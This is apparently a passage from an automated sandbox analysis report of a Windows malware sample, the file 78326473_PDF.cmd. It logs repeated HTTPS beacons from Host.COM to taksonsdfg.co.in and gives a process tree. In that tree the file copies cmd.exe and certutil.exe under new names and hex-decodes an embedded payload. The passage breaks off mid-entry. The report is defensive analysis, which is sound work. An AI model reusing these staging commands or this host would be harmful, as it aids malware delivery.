                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:57 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  49192.168.2.750015108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:59 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:59 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:59 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:59 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:59 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  50192.168.2.750021108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:40:01 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:40:02 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:40:01 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:40:02 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  51192.168.2.750025108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:40:03 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:40:04 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:40:03 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:40:04 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:40:04 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:40:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  52192.168.2.750032108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:40:06 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:40:06 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:40:06 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:40:06 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  53192.168.2.750037108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:40:08 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:40:08 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:40:08 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:40:08 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:40:08 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:40:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  54192.168.2.750044108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:40:10 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:40:11 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:40:10 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:40:11 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  55192.168.2.750049108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:40:12 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:40:13 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:40:12 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:40:13 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:40:13 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:40:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:03:38:04
                                                                  Start date:26/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\78326473_PDF.cmd" "
                                                                  Imagebase:0x7ff6fcb00000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:03:38:04
                                                                  Start date:26/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff75da10000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:03:38:05
                                                                  Start date:26/11/2024
                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                  Imagebase:0x7ff62f9c0000
                                                                  File size:35'328 bytes
                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:03:38:05
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\alpha.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                  Imagebase:0x7ff719660000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:03:38:05
                                                                  Start date:26/11/2024
                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                  Imagebase:0x7ff62f9c0000
                                                                  File size:35'328 bytes
                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:03:38:05
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\alpha.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                  Imagebase:0x7ff719660000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:03:38:05
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\kn.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                  Imagebase:0x7ff68ac30000
                                                                  File size:1'651'712 bytes
                                                                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:03:38:07
                                                                  Start date:26/11/2024
                                                                  Path:C:\Users\Public\alpha.exe
                                                                  Wow64 process (32bit):false
